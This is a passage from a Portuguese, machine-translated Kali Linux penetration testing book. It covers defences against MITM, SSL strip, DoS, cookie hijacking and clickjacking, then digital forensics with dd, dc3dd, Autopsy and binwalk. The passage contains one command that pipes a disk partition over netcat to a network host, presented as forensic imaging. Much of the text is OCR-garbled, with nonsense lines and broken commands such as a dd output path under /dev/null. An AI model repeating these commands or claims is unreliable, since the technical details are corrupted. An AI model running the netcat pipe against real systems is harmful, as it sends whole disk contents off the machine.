Autoridade Internet. Isto soa muito bem, mas quem é o Google Internet Autoridade? 

Posso confiar neles? Será que é realmente o Google? Neste exemplo, eu tenho um outro certificado 
autoridade apresentada por cima da Internet Autoridade Google chamado Equifax seguro 
Autoridade de Certificação. Equifax tem uma série de verificações e balanços antes de emitir 
certificado para garantir um negócio é válido. Verificando que Equifax gerou este 

certificado que me faz sentir confiante de que posso confiar neste certificado. 


Em última análise, HTTPS depende do conceito de confiança. Para ser mais explícito, a questão 

se resume a confiar na autoridade de certificação que emitiu o certificado é válido 

e legítimo. Para ambientes de laboratório, é comum encontrar certificados auto-assinados 

que os alarmes gatilho da maioria dos navegadores de Internet mais populares. Esse pop-up irritante 
que 

usuários se queixam ao acessar sites serve como um meio para avisar que a 

autoridade de certificação não é provável confiável, e há o risco de um ataque MITM. 


This Connection is Untrusted 


You have asked Firefox to connect securely to insidemit-apps.mit.edu, but we cant 
corfirm that your conmection is secure. 


Normally, when you try to connect securely, sites will present trusted dentification to prove 
that you are going to the right place. However, this site's sdentity can't be verified. 


What Should | Do? 


if you usually connect to this site without problems, this error could mean that someone is 
trying to impersonate the site, and you shouldn't continue. 


Get me out of here 


= Technical Details 


= | Understand the Risks 
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Criptografado Virtual Private Network (VPN) é uma outra forma de proteção contra 
man-in-the-middle. Ao criptografar todos os dados enviados de e para o seu dispositivo 

ao mascarar o seu endereço (IP) Internet Protocol, VPNs criptografadas garantir 

que você estiver em uma rede que não podem ser monitoradas ou gravadas por ninguém, exceto 
o fornecedor de VPN. 


VPNs pode usar métodos de autenticação forte, como a autenticação de dois fatores, 
que inclui um nome de usuário e senha, juntamente com algumas outras formas de 
autenticação, tal como OTP (De uma só vez senhas), tokens, ou certificados. Este 
faz com que seja difícil para um atacante para roubar a autenticação necessária para 
estabelecer 

uma VPN usado por outro usuário. 


VPNs têm a capacidade de utilizar métodos de criptografia, tais como PPTP, L2TP, SSL e IPSEC. 
SSL e IPSEC VPNs fornecer segurança de nível superior para a guarda de dados em comparação 
com 

outros protocolos por causa de seu uso de protocolos de criptografia forte de criptografia. 


VPNs são fornecidos por ambas as organizações públicas e privadas. É 
possível que o provedor de VPN pode ser capaz de analisar o seu tráfego, 

st porque eles são os prestadores de serviços confiáveis. Portanto, a questão 

| de confiança ainda é um conceito muito importante quando se utiliza uma VPN. Você 
Wg deve 

perguntar se você confia no seu provedor de VPN para proteger seus dados e 
privacidade. 
Sua segurança de dados está nas mãos do prestador de serviços. 


Outras técnicas que podem ser usadas para se defender contra os ataques MITM são Acesso à mídia 
Controle de Segurança (MACsec) e 802.1x. Estas abordagens usar redes avançadas 

para fornecer autenticação de origem, integridade de dados e criptografia como viagens de trânsito 
em toda a rede. Ambas as abordagens requerem compatibilidade com os equipamentos e deve ser 
activada correctamente, de modo a ser eficaz. 


Defesa tira SSL 


Tira SSL (coberto de Capítulo 3, os ataques lado do servidor, permite que atacantes para tirar ou 
arrancar 

a parte criptografada de um site e ver sessão de Internet da vítima, incluindo 

informações confidenciais. E comum vincular tira SSL com outro ataque, como 

como um man-in-the-middle, o que significa hackers irá capturar todo o tráfego e despir SSL 
criptografia de modo que tudo é visível para tráfego sniffing ferramentas do hacker. Cobrimos 
este conceito em Capítulo 5, Atacar de autenticação, deste livro. 
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Para se proteger contra ataques de strip SSL, é importante entender como tira SSL 

explora uma vítima. O ataque se aproveita de sites redirecionando os usuários a partir de um não- 
versão do site criptografado, para uma versão criptografada do site. Quando você navega 

para http:/Iwww.facebook.com OU http:/Avww gmail.com, Você vai notar que você esta 

redirecionado para https://www.facebook.com e https:/Awww gmail.com. Tira SSL 

quebra o redirecionamento e obriga a vítima a usar a versão não segura do 

site. Além disso, ainda mesmo que o site não tem uma versão não-seguro, mas tem 

um redirecionamento, tira SSL irá interceptar a solicitação HTTP e encaminhar o usuário para HTTPS 
site. Quando a vítima faz isso, o atacante poderá ver toda sessão da vítima. 


Um método para se proteger contra ataques de strip SSL é garantir que os sites não têm 

uma versão não-seguro de si mesmo e que não implementar recursos de redirecionamento. Este 
impediria um ataque sslstrip, porque não existe a possibilidade de redireccionamento. Quando um 
vítima é atacada, eles simplesmente não ser capaz de chegar a um website. Entendemos a partir de 
um ponto de vista a implementação do mundo real que isso é muito difícil de aplicar. As pessoas são 
utilizado para a digitação de um pedido HTTP não-seguro e ser redirecionado automaticamente 
guando 

E necessária segurança. Além disso, muitas empresas não gostaria que os usuários a pensar o seu 
site 

está em baixo devido a não aceder a uma versão segura do site. Portanto, a melhor proteção 

a partir de lâminas SSL é educar os usuários sobre como os ataques cibernéticos ocorrer para que 


parsanefeniisigádeMmétodos de defesa esboçamos anteriormente contra man-in-the-arbítrio meio 
também defender contra ataques de strip SSL. A razão para isto é tira SSL depende de um homem- 
in-the-middle ataque ocorra. 


Negação de Serviço defesa 


A maioria Distribuído ou padrão Denial of Service (DDoS / DoS) ferramentas estão abertos 
utilitários de código escrito em C # ou Java. Foi demonstrado em Capítulo 6, ataques na Web, 
como uma única pessoa usando uma ferramenta de DoS podem ter um impacto devastador para 
um negócio 

limitando o acesso a fontes on-line ou derrubar um site. Ferramentas DDoS / DoS sao 
anunciado como aplicações web ferramentas de testes de estresse. Embora eles poderiam 
potencialmente 


ser utilizado para que, em muitos casos, eles são utilizados para fins nefastos. 
Ataques DDoS / DoS, na maioria dos casos requerem hardware infraestrutura de rede abusar. 


Um dos métodos mais comuns para se defender contra DDoS / DoS é a configuração de rede 
dispositivos que podem lidar com grande fluxo de pacotes, a capacidade de detectar anomalias 
padrões de comportamento e de tráfego. Tráfego malicioso identificado deve ser automaticamente 
filtrou-se para evitar a interrupção do serviço. Ferramentas de fornecedores, tais como balanceadores 
de carga 

e firewalls de aplicativos web, fazer um grande trabalho de detecção e defesa contra 

volumétrica e ataques do tipo de aplicação. Ferramentas de segurança com capacidade de detecção 
de DoS 

são capazes de reconhecer rede, sessão e tráfego da camada de aplicação, que é importado 

para mitigar riscos de DoS que pode existir em todas as camadas da pilha de protocolos. 
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Para se defender contra os ataques contínuos e prolongados, muitas organizações se voltam para a 
Provedor de serviços de aplicação DDoS. Um prestador de serviço de aplicação DDoS trabalha com 
seu ISP e as tentativas de parar de DDoS de chegar a sua rede, redirecionando o tráfego 

longe de sua organização. Eles fazem isso por meio de protocolos de roteamento, como BGP 

e técnicas avançadas de DNS. 


A maioria dos ataques de DDoS / DoS usar endereços IP falsos ou inválidos ao atacar 

uma organização. Os administradores de rede devem implementar Unicast Inverter caminho 
Encaminhamento (Unicast RPF) em seus roteadores de borda voltados para a Internet como uma 
proteção 

mecanismo contra a falsificação de endereços de origem IP quando usado para lançar ataques 
DDoS 

ataques. Unicast RPF é considerado melhores práticas para-virado de ponta da Internet 
roteadores, 

e um bom começo para se defender contra DDoS / DoS. Unicast RPF está configurado no 
nível de interface em roteadores Cisco. Outra empresa fabrica pode ter semelhante 
características em seus roteadores também. Quando Unicast RPF está configurado, não- 


variigavalca mais recente utilizada para identificar trafego DDoS / DoS esta alavancando Netflow em 
CUr eens 48 iRvaddas Sesseces ¢AERGeSa parar o tráfego de entrada na rede como 

bem como a identificação de ataques internos. Comportamento do tráfego é analisado e qualquer 
indicação 

que a rede de ver o tráfego malicioso irá disparar alarmes, como Smurf ou 

Pacotes Teardrop. Soluções DDoS Leading / DoS oferecem a capacidade para monitorar 

DDoS internos e externos / ameaças DoS. 


Defesa de Cookies 


Como discutimos em capítulos anteriores, biscoito sequestro é uma técnica onde um atacante 
rouba cookies de sessão. Biscoito sequestro pode ser derrotado se o seu site está funcionando 
SSL/TLS 3.0. Muitos atacantes irá ignorar o SSL / TLS, usando uma combinação de man- 

no entanto, ao assegurar a sua aplicação web só; in-the-middle ou ataques tira SSL 

tem páginas seguras, ou seja, não fornecer um redirecionamento HTTP para HTTPS, irá atenuar 
as formas de ataque. 


a Biscoito sequestro pode trabalhar através de conexões SSL / TLS, se os atacantes usam 
"e >) cross-site scripting para enviar cookies para seus servidores. Os desenvolvedores podem 
Ss \ mitigar 


esse risco, definindo o Proteger e HttpOnly Bandeiras na cookies. 


Um erro comum sobre segurança de aplicações web está assumindo desenvolvedores 

garantir toda a sessão, em vez de apenas o portal de autenticação para uma web 

aplicação. Quando toda a sessão não está protegido, um usuário pode, eventualmente, ser atacado. 
Os desenvolvedores devem garantir toda a sua aplicação suporta web seguro e criptografado 
sessões através de SSL / TLS 3.0 para evitar ser vulnerável a ataques. 
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Defesa adicional contra bolinho sequestro está disponível com populares Aplicação 

Delivery Controller (ADC) aparelhos, como balanceadores de carga e filtros de conteúdo. 
Vendedores populares a serem considerados são a Cisco, Bluecoat, Riverbed, Websense, e muitos 
outros. Muitos desses vendedores mudar bandeiras de biscoito para Proteger e HttpOnly. Eles 
também têm construído em técnicas de decoro para mitigar alguns ataques cross-site scripting. 


Defesa Clickjacking 


Clickjacking estava coberto de Capítulo 5, Atacando de autenticação, e é o 

técnica onde um atacante engana um usuário a clicar em algo que não seja 

o que eles acreditam que estão clicando em. Uma das melhores maneiras de proteger contra 
clickjacking é, executando a extensão noscript para navegadores Firefox ou Chrome. 

Isso vai evitar que códigos não autorizados sejam executados no seu navegador web. Noscript 
pode detectar os scripts não-autorizadas, alertar o usuário do script e impedir que o script 

de execução. Os usuários têm a capacidade de desativar os controles de script globalmente por 
sessão ou por site. 


Os autores deste livro são grandes fãs de noscript, no entanto, você deve incentivar 
desenvolvedores web para configurar cabeçalho X-Frame-Options em respostas HTTP para 
mitigar 

este risco em aplicações web. Além disso, alguns controlador de entrega de aplicativos 

aparelhos (ADCs), oferecem aos administradores a opção de escrever scripts personalizados que 
também pode ajudar a reduzir esse risco. 


l : 2 = 
> Alguns sites podem ter razões legítimas para executar um script. Isso poderia 


SÁ ser para carrinhos de compras ou outros sites de comércio eletrônico. 
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Forense digital 


Kali Linux 1.0 inclui um número de ferramentas para lidar com requisitos forenses. 

Forense é a prática de investigar provas e da verificação dos factos de interesse 

que liga a um incidente. Esta seção lhe dará uma introdução para o digital 

forense como nós acreditamos que é necessário ter um plano de reação quando um de seus 
ativos, tais como um servidor web ou aplicativo, está comprometida. E recomendado 

pesquisar outras fontes para um treinamento mais completo como este tema se estende para além 
as ferramentas disponíveis no Kali Linux. Forense digital é uma área de crescente interesse em 
segurança da informação com muito poucas pessoas que conhecem bem. 


É importante lembrar-se de três regras a qualquer hora que você trabalha em forense digital. 
O não cumprimento destas regras fará opiniões de vocês parecem amadoras, 
e, provavelmente, tornar a sua investigação forense, inclusive. 


A primeira regra é nunca trabalhar sobre dados originais. Sempre use uma cópia. Certifique-se de não 
fazer 

modifique os dados quando você cria uma cópia. No momento em que você toca ou modificar dados 
originais, 

o caso torna-se inútil. Evidência adulterado nunca pode ser usado em qualquer jurídica 

prosseguir, independentemente do que for encontrado. A razão é uma vez um original é modificado, 
existe a possibilidade de identificação de provas falsas que podem deturpar a verdadeira 

incidente. Um exemplo é fazer uma mudança que ajusta a hora do sistema 

registros. Não haveria maneira de distinguir essa mudança de um amador analista de 

erro ou um hacker tentando cobrir seus rastros. 

A maioria dos cientistas forenses vai usar dispositivos especializados para copiar dados bit a bit. Lá 
também é um software muito respeitável que vai fazer a mesma coisa. E importante que o seu 
processo ser muito bem documentado. A maioria das cópias digitais em processos judiciais que 
foram expulsos foram removidos devido a um hash de um meio de armazenamento, como 

um disco rígido, não combinando dados copiados. O hash de um disco rígido não irá corresponder a 
um 

contaminado cópia, mesmo que apenas um único bit é modificado. Uma partida de hash significa 
que é 

extremamente provável que os dados originais, incluindo logs de acesso do sistema de arquivos, 
apagados disco de dados 

ntfesmaçde se ragiadatne ssennkytepa ayata wa ponte alendadoaotigita .deve ser 

examinado. Em casos famosos envolvendo mídia digital, evidência crítica tem sido 

encontrado em uma câmera, gravadores DVR, consoles de videogame, celulares, iPods e outros 
dispositivos digitais aleatórias. Se o dispositivo tem qualquer capacidade de armazenamento de 
dados de utilizador, então 

é possível que o dispositivo pode ser utilizado em uma investigação forense. Não descartar 

um dispositivo de apenas porque é improvável. Um sistema de navegação do carro que armazena 
mapas e 

música em cartões SD pode ser usado por criminosos para esconder os dados, assim fornecer provas 
para o uso da Internet baseado em download de tags de música. 
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A última regra fundamental para forense digital é garantir a documentar todas as suas descobertas. 
Todas as provas e etapas utilizadas para chegar a uma conclusão deve ser de fácil compreensão 
para ele 

para ser credível. Mais importante ainda, os seus resultados devem ser recreatable. Independente 
investigadores devem chegar à mesma conclusão que você está usando a documentação 

e técnicas. Também é importante que a documentação estabelece um cronograma 

de eventos quando especificidades ocorreu e como ocorreu. Todos cronograma 

conclusões devem ser documentadas. 


Uma investigação forense é tudo sobre a percepção de ser um especialista em segurança 
validando evidências ligadas a um incidente. E fácil ser pego procurando 

bandidos e tirar conclusões sobre o que pode ter acontecido com base na opinião. 

Esta é uma das maneiras mais rápidas para desacreditar seu trabalho. Como um especialista 
forense, você 

só deve expor os fatos. Será que a pessoa Alice roubar arquivos de Bob, ou fez a conta 

que foi registrado como o nome de usuário Alice iniciar uma cópia da conta de usuário 

Diretório home do Bob para uma unidade USB com XXX número de série no timestamp 

XXX XXX em data? Veja a diferença? O verdadeiro vilão poderia ter roubado de Alice 

as credenciais de login (usando métodos abordados neste livro) e roubar dados de Bob enquanto 
posando como Alice. O momento que você saltar para uma conclusão é o momento em que seu 
caso 

torna-se inconclusivos base na interferência pessoal. Lembre-se, como um forense 

especialista, você pode ser solicitado sob juramento para prestar depoimento sobre o que 
exatamente 

aconteceu. Quando qualquer coisa fora de fatos entra o registro, a sua credibilidade 

será interrogado. 


Kali Forensics Bota 


Kali Linux tem a opção de usar um Forensics de inicialização. Modo forense Kali é selecionado 
quando você inicializar um sistema com um disco de boot-up Kali, como o CD ao vivo. Se você 
quiser 

usar Kali como um kit de ferramentas de análise forense, é altamente recomendável manter um Live 
CD como Kali 

parte do seu kit de ferramentas. O Kali Vivo CD pode ser obtido como uma imagem ISO baixado 

no site da Kali Linux (consulte a Capítulo 1, sobre a instalação de Kali). Quando botas Kali, 

você vai ver Modo Forensics como uma das opções seleccionáveis. 


CPANEL BOL, 


Root mera 


Prex: ENTER to booi or TRE te elit a aemm entry 


[266] 


Capítulo 7 


Usando Kali em Modo Forense ajuda você a atingir o seu número de uma regra de ouro de não 
modificar o sistema de arquivos de origem. O disco rígido interno não é tocado e não 

há a automontagem dos discos internos. Partições de swap e de qualquer outra memória ou cache 
partições também não são utilizados em qualquer forma. 


No modo forense, mídia removível não será montado automaticamente. Se um CD ou um polegar 
unidade é inserida no sistema, nada acontecerá. E possível que você pode querer 

usar a mídia removível no modo forense por montá-lo manualmente. Isto dá 

o especialista forense controle completo do sistema de arquivos e mídia que está sendo 

montado no sistema. 


Como dito anteriormente, você deve sempre trabalhar em uma cópia da fonte de dados. É 
importante manter o sistema de arquivos da cópia intacta assim você pode mostrar que você não 
fez 

modificá-lo, bem como de que seus passos podem ser recriados. Vejamos como usar as 
ferramentas 

disponível em Kali copiar e dados de hash. 


Análise do Sistema de Arquivos com 


Kalima das ferramentas Linux / Unix mais comuns usados para copiar sistemas de arquivos. 


farramenta pode ser usada para fazer uma cópia exata de um sistema de arquivos, incluindo 
excluídos e bota 

setores. Em muitos casos, o instrumento é usado para criar um ficheiro de imagem de disco de 
meios externos 

ou discos rígidos. Quando dd cria uma imagem de disco, ele pode ser montado e examinadas 
outros sistemas. dd pode salvar a imagem de disco em um compartilhamento de rede, se 
necessário ou um USB 

dirigir tão analistas forenses não toque no sistema de arquivos local. O próximo exemplo será 
examinar como usar dd para fazer uma cópia de um disco rígido interno. O primeiro passo é 
Yeleisrexaouiancacninande c&itinbpacrrexibaraDimforhnaeGp do datmoasidietozense. 
estamos realizando análise. 


tors/track 


Warning: extended 
DOS and Linux will 
Inits a ylir Jers of £ 528 byte ble s of 324 bytes, counting from 6 
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A figura anterior mostra cinco partições. Divisórias 1, 2, e 5parecem 

o mais interessante, uma vez partição 3e 4são listados como vazio. Lembre-se, troca 

partições podem conter informações que sobraram de atividades do usuário e cache. Se tivéssemos 
arrancado com o CD ao vivo em um sistema baseado no Windows, veriamos uma partição diferente 
estrutura, no entanto, o conceito global seria a mesma. 


O próximo passo é decidir qual partição para copiar. Vamos selecionar a primeira partição listados 
na imagem anterior como / Dev/sda1. 


O uso básico do dd comando é como segue: 
dd if = <media/partition numa vazia> de = <image file> 


Para este exemplo, vamos digitar o seguinte comando para fazer uma cópia da primeira 
partição: 


dd if = / dev/sdal of = sdal -image.dd 


Isso irá criar um arquivo de imagem que é uma cópia exata de nosso sdai partição para o nosso local 
sistema de arquivos. Espero que você ver um grande problema com o que fizemos. Nós apenas 
quebrou uma das 

nossas regras de ouro de não modificar os dados originais, quando escreveu o arquivo para o nosso 
sistema local, o que é considerado como modificar os dados. A melhor prática é escrever o 

arquivo de imagem para um outro sistema de arquivos, como uma partição diferente, 
compartilhamento de rede, ou um 

Drive USB. Preferência pessoal do autor está usando um drive USB, no entanto, para este 

exemplo, utilizando-se o sistema local é aceitável para fins de teste. 

Para utilizar um drive USB para o armazenamento do sistema copiado, primeiro você precisa ligar 
um grande drive USB em seu sistema. Desde que você está no modo forense na Vivo 

CD, Kali não vai montar a unidade USB. Normalmente, você quer deixar o sistema de arquivos 
desmontado e deixar o dd ferramenta de lidar com as especificidades da unidade. Para fazer isso, 
execute o 

comando mostrado na imagem seguinte: 


:=# dd if=/dev/sdal of=dev/null/sdal-image.ddE 


A localização do dispositivo USB foi / Dev / null /; no entanto, você pode escolher qualquer local. 
Você também pode salvar a imagem diretamente em um compartilhamento de rede NFS. Você 
pode fazer isso usando 

o seguinte comando: 


dd if = / dev/sdal | porto nc my ip address to network server opcional 


No exemplo a seguir, estamos clonando a partição sda1 para nosso armazenamento NFS 
servidor com um endereço IP de 10.0.0.5: 


dd if = / dev/sdal | nc 10.0.0.5 
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Existem outras ferramentas que estão disponíveis para clonar um sistema de arquivos. Recomenda- 
se O 

dd ferramenta para clonar partições específicas, porque é construído em Kali ea maioria dos outros 
Sistemas Linux e Unix. O processo para clonar um sistema pode ser muito demorado, 

dependendo de quão grande é a partição que você está tentando copiar. Embora dd 

É uma ótima ferramenta, ele pode não ser sempre a melhor ferramenta. Se você estiver olhando para 
clonagem 

um disco inteiro, existem outras ferramentas populares, como AIMAGE ou AIR Imager, que 

não vem pré-carregado com Kali, mas são muito populares. E importante confirmar 

ferramentas utilizadas em uma investigação forense aderir a admissibilidade evidências padrão 
regulamentos, se existe a possibilidade que a investigação será usado em uma questão jurídica. 


dc3dd 


dc3dd é o dd ferramenta com funcionalidades adicionais para análise forense. dc3dd pode calcular 
um 
de hash entre a unidade que você está copiando e da unidade de origem em um nível pouco a 
pouco. 
Isso é fundamental quando se pretende provar a cópia dos dados que você está trabalhando é 
exatamente como o 
inicial. PRP ser realizado através da criação de um hash de o original CR gópia 

S ades e 


ara PERNA SE e ABANA cutar O sfdisk-l comando para ver às uni 
artições 


isponiveis, como mostrado na imagem seguinte: 


s/t track 


Linder boundary. 


O dc3dd comando é executado de uma forma semelhante como o dd ferramenta. Você escolhe uma 
fonte 

unidade ou partição, bem como o destino para salvar a imagem. Há também um hash 

opção. No próximo exemplo, tomamos a partição de / Dev/sda2 e copiá-lo para uma 

arquivo de imagem chamado CopyofDrivedc3dd, juntamente com o cálculo de um hash utilizando 
sha256. 
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i F ; E 
> Este exemplo é para fins de demonstração. Um verdadeiro forense 
| investigação não iria salvar a imagem de volta para a mesma unidade. 


dc3dd lhe dara um código hash exclusivo para o arquivo de entrada da unidade copiada quando 
ela é completa. 


jc 3dd 
compiled o 
ommand 1 


Jev let 
Jd v A 


jc3dd completed at 


É importante demonstrar a hash da cópia coincide exactamente com o original. Podemos 

use o comando sha256sum para calcular o hash. Se calcularmos o hash em nosso arquivo 
CopyofDrivedc3dd bem como a nossa unidade de disco rígido / Dev/sda2, Vamos ver que eles 
correspondem. Nós 

pode até mesmo ver a saída da nossa cópia dc3dd também é o mesmo. Desde o hash corresponde, 
temos confirmado os arquivos são exatamente os mesmos para uma investigação forense. 


ersion 


[9400094240 6 1747 
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Outras ferramentas forenses em Kali 


Kali tem inúmeras ferramentas forenses construído em na categoria rotulada Forensics. 
Aqui estão algumas ferramentas comumente usadas em Kali, quando aplicado a aplicações web 
forense: 


chkrootkit 


chkrootkit pode ser executado em sistemas Linux para determinar se rootkits existir no 
sistema, com base em assinaturas e processos. Pense nisso como antivírus ou 
antimalware para sistemas Linux. 


Para executar o chkrootkit, abra um Terminal janela e tipo chkrootkit. Este irá verificar 
o sistema operacional local para todos os rootkits instalados. 


# chkrootkit J 


Chkrootkit é um programa simples que pode garantir a sua cópia de Kali não foi 
infectado. Você também pode executar chkrootkit em outras distribuições Linux, instalando 


que nesses sistemas. 


Autópsia 


Autópsia é uma ferramenta forense digital de open source que roda em Windows, Linux, OS X, 
e outros sistemas Unix. Autópsia pode ser utilizado para analisar imagens de disco e realizar 
uma análise em profundidade dos sistemas de arquivos, como NTFS, FAT, HFS +, Ext3, UFS, e 
vários 

tipos de sistema o volume. O uso mais comum de autópsia é como uma gestão de casos 
ferramenta para o gerenciamento de análise de arquivos de imagem. Lembre-se de como nós 
criamos um arquivo de imagem 


usando o dd ferramenta? Autópsia vai nos ajudar a investigar a imagem. | 
Para executar Autopsy, navegue até Kali Linux |Forensics |Digital Forensics e selecione 


Autópsia. Isso fará com que um Terminal janela, que irá iniciar a aplicação. 
Deixe essa janela aberta e use a ferramenta por meio de sua interface web. Para acessar a web 
interface, abra um navegador web e navegue até http://localhost:9000/autopsy. 


WARNING: Tous becwsar currently has Java Script emabisd 


You do net need Jaws Script to use Autogety anit it pe recommended that ® fe turned of for secas reerons. 


Astopsy forensic Browser 2.29 
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Selecionar Novo caso para criar um novo caso. Isto lhe dará o seguinte 
imagem de exemplo: 


CREATE A NEW CASE 


1. Case Name: The name of this investigation. It can contain only 
letters, numbers, and symbols. 


CaseQl 


2. Description: An optional, one line description of this case. 


rChaos Test Case 


3. Investigator Names: The optional names (with no spaces) of the 
investigators for this case. 


a. |Aanw Lakhani b, Joey Muniz 


Autópsia irá pedir a algumas perguntas antes de continuar. Perguntas incluem definição 
o fuso horário, entrando deslocamentos de tempo entre o seu sistema de Kali e do sistema 
estão investigando, e descrições, tais como nomes de host. 


O próximo exemplo usaremos autópsia para examinar um arquivo de imagem que foi criada no 
um exemplo anterior com a ferramenta dd, como mostrado na imagem seguinte: 
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O primeiro passo é carregar um Autópsia de imagem como mytestimage.dd. 


1. Location 

Enter the full path (starting with /) to the image file. 

If the image is split (either raw or EnCase), then enter *' for the 
extension. 


froot/mytestimage. dd 


2. Type 


Please select if this image file is for a disk or a single partition. 
Disk è Partition 


3. Import Method 

To analyze the image file, it must be located in the evidence locker. It 
can be imported from its current location using a symbolic link, by 
copying it, or by moving it. Note that if a system failure occurs during 
the move, then the image could become corrupt. 


Symlink * Copy Move 


Você terá a opção de definir um valor de hash para o arquivo quando se utiliza o dd ferramenta. 
Você pode ter Autopsy calcular o valor hash. Os autores recomendam o cálculo 
seu próprio MD5 checksum. Isto pode ser feito usando o md5sum comando em um arquivo. 
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Você pode pegar o valor que é calculado e colocá-lo diretamente na autópsia. 


oma dir wo a i ; 
* aid i TaN 5,15 MOIS 2091 03,19 n 
LASOS UT) 10486 OST) 1948288 ICT) 
Fib Name Soares sip deee NOLDLIS BLASS WILNA. 
Weak CST O42 SST Te S187 
vee ty Taphwdabin deram POLOS  W0103.16 == MOLDIIS 
ob ethane allah EUSES ODIADICST) ISIS (CST) 


ho) 0215 pts i6 ry 03S 
134505 (CST) 312 4C ST) 194348 a 
w01 0415 mico 20) 

IVC (CST) ALDI? CST CST) 


File Browsing Mode 


Je fas rmode, yra cam select a Like ur dineehory 
File contents will be shown in this window 
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Autópsia é uma plataforma que pode ajudar a coletar informações forense para documentação 

fins. Quando uma partição está pronta para ser examinada, você pode usar Autópsia de olhar 

no disco específico, informações, arquivos raw, e seus metadados do arquivo. Autópsia também pode 
conectar-se ao Instituto Nacional de Padrões de Software Biblioteca de Referência para comparar 
hashes de arquivos conhecidos para determinar se eles são bons ou maus programas. 


Binwalk 


Muitas vezes, é difícil de determinar a finalidade de arquivos binários identificados durante 

uma investigação forense. A razão é o código-fonte para arquivos binários é normalmente 

não disponível. Binwalk é uma ferramenta de análise de firmware projetado para auxiliar na análise, 
extração, e engenharia reversa de imagens de firmware e outros softwares binário. 

O foco é Binwalk arquivos binários de firmware, no entanto, existem atualizações localizadas 

para redes domésticas e de equipamentos sem fio, bem como outro consumidor 

aparelhos eletrônicos. 


Binwalk tem algumas opções diferentes que podem ser encontrados em: https://code.google. 
com / p/ binwalk / wiki / Uso. Você pode executar o comando binwalk com o nome do arquivo 
do arquivo binário que você gostaria de examinar. O próximo exemplo usa binwalk em um 
firmware binário para um roteador sem fio em casa, como mostrado na imagem seguinte: 


Binwalk resultados saída do arquivo binário: 
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A figura anterior mostra o administrador baixado um arquivo binário e 

renomeou para fazer parecer que ele estava vindo de um fornecedor diferente (FW WRT54G 
é um roteador Linksys). Binwalk foi capaz de analisar o arquivo e alerta que o arquivo é um 
Sercom firmware arquivo, mesmo que o arquivo foi renomeado para o formato Linksys. 


pdf-parser 


pdf-analisador é usado para analisar e analisar Portable Document Format (PDF) 
documentos, bem como extrato de informação em bruto, tais como código, imagens, e outros 
elementos de documentos PDF. E uma ferramenta utilizada para analisar e desconstruir PDF 
documentos que são identificados como possivelmente ter código malicioso. 


Principal 


Acima de tudo é um utilitário de escultura de dados usado para recuperar arquivos com base em 
seus cabeçalhos, 
rodapés e estruturas de dados internas. Acima de tudo funciona com arquivos de imagem, tais como 
os 
gerado pela dd, Safeback, Encase, ou diretamente na unidade. Os cabeçalhos de arquivo de imagem 
e 
rodapés pode ser especificado por um arquivo de configuração ou usando linha de comando para 
identificar arquivos 
Pos Estes tipos embutidos olhar para as estruturas de dados de um determinado formato de 

r 


RARE Dermitindo que 
PALY BURR ARANI E RRL FeMiF GaRIFR-arquivos que são criados pela Microsoft 
Internet Explorer. O Internet Explorer index.dat arquivos armazenam navegador do usuario 
historia, que pode ser útil para uma investigação de um host. Microsoft armazena o 
index.dat apresentar em varios locais no disco rigido do sistema host. Por exemplo, 
alguns index.dat arquivos estão em pasta pessoal do usuário usada para o perfil do usuario. 


Pasco só funciona para o Internet Explorer. Outros navegadores como Firefox e 
Chrome não deixe arquivos de index.dat. 
g Firefox e Chrome informações navegador do armazenamento em bancos de dados SQlIfite. 
av O local da base de dados varia de sistema operacional para operação 
> sistema, mas eles podem ser abertos com qualquer visualizador SQLite. Um dos 
ferramentas favoritas do autor para clientes SQLite 6 um plugin do Firefox chamado 
SQLite Manager. 
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Bisturi 


Scalpel é um utilitário escultura arquivo que procura um banco de dados de cabeçalho do 
arquivo conhecidos e 

assinaturas de rodapé, e as tentativas de esculpir arquivos uma imagem de disco. Isto é feito 
pela 

configurar o scalpel.conf arquivo com o tipo (s) arquivo que você gostaria de localizar 

antes de lançá-lo contra um banco de dados. 


bulk extractor 


bulk extractor pode extrair uma variedade de coisas a partir de uma imagem, incluindo cartão de 
crédito 

números, números de telefone, URLs, e-mails. bulk extractor também pode gerar 

Wordlists a partir de uma imagem que pode ser usada em ataques de dicionário. bulk extractor 
pode levar várias horas para ser executado, mas os dados que é extraído é valeu a pena esperar 
para uso em medicina forense. 


Resumo 


É fundamental que a segurança é considerada durante todo o ciclo de vida de todos os recursos 
que são importantes para as operações comerciais. Nossa meta para escrever este livro para além 
apoiar um verificador da penetração é educar leitores sobre vários métodos; malicioso 

os usuários podem comprometer um recurso, para que os administradores podem melhorar a sua 
segurança 

defesas. Todo mundo é um alvo, e cabe ao proprietário de ativos para investir o bom 

tempo e recursos para a redução do risco de ser comprometida. 


Este capítulo serve como um meio para se defender contra ataques apresentados no anterior 
capítulos. Deve-se supor que as ferramentas utilizadas nos capítulos anteriores pode ser 
aproveitados para verificar vulnerabilidades em seus próprios sistemas. Os tópicos abordados 
neste 

capítulo incluído como clonar uma aplicação web para evitar sistemas ativos de teste, 
padrões de segurança da linha de base, e defesa contra tópicos de capítulos anteriores. 
Esses temas incluem senhas, ataques man-in-the-middle, striping SSL, Dos, 

roubar cookies, e clickjacking. Este capítulo também inclui uma seção dedicada 

sobre o uso de Kali Linux para investigações forenses. 


O próximo capítulo irá cobrir as melhores práticas para a entrega de Teste de Invasão 
serviços, incluindo métodos para desenvolver as entregas dos clientes profissionais. 
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Ensaio de 
Penetração 
Relatório Executivo 


Antes de começarmos, queremos destacar neste capítulo toques sobre temas de 

escrever relatórios, cláusulas e acordos. Estes exemplos devem ser utilizados como general 
diretrizes. De nenhuma maneira estamos advoga ter conhecimentos ou técnicas que poderiam 

ser aceito de forma legal. Apesar de sete dos nossos perfis do Facebook, sendo advogados, 

e sendo fas de Boston Legal, não somos Denny Crane. Recomendamos quando você 

levar a sério sobre o desenvolvimento de escopos, contratos e relatórios, você procura profissional 
ajuda legal. 


Os engenheiros de rede instalação de redes, programadores criar aplicações e auditores 
escrever. Como um verificador da penetração da rede, você está, por padrão, um auditor. Ao contrário 
de um 

rede engenheiro que irá configurar protocolos de roteamento, ou um programador que vai 

criar um aplicativo, o seu valor será baseado em sua escrita. Em outras palavras, aprender 

como escrever. Não é uma ciência e arte associada com a escrita. Se você está tentando 
encontrar um estilo consistente, os autores deste livro recomendam A Modern Language 
Association of America Style, ou melhor conhecido como MLA. MLA é um fácil de usar 

estilo de escrita, usado pela maioria das escolas de ensino médio como um padrão de escrita. H. 
Ramsey Fowler 

e Jane E. Aaron guia de referência, com o título A Little, Brown Handbook, é um excelente 

guia de referência sobre como usar corretamente estilos MLA quando escreve. Como Penetração 
Tester, e, finalmente, como um auditor, o valor que você fornecer serão julgados em como 

